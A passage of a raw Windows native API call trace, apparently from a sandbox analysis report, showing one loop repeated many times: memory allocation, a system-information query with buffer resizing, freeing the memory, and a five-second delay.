SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.453] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.453] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.454] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.458] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.459] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.461] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.461] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.462] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.463] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.463] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.467] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.469] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.470] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.471] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.472] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.472] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.472] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.476] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.476] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.478] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.478] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.479] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.479] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.479] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.484] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.485] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.486] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.487] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.488] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.488] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.488] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.493] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.494] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.496] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.496] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.497] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.498] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.498] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.502] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.503] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.505] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.505] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.506] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.506] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.507] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.511] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.513] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.514] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.515] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.516] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.516] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.516] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.521] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.522] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.523] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.523] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.524] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.525] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.525] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.529] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.530] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.532] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.532] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.533] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.533] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.534] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.538] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.539] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.540] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.540] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.541] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.542] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.542] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.546] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.547] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.549] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.549] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.550] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.550] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.550] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.555] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.556] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.558] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.558] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.559] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.560] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.560] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.564] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.565] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.567] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.567] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.568] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.569] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.569] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.575] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.576] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.579] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.579] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.580] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.580] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.581] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.585] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.586] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.587] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.588] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.588] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.589] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.589] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.594] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.595] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.596] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.597] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.598] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.598] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.599] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.604] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.605] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.607] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.607] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.608] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.608] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.608] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.614] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.615] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.616] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.617] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.618] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.618] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.618] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.623] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.624] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.625] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.626] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.626] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.627] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.627] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.634] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.635] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.636] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.636] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.638] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.638] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.638] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.643] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.644] 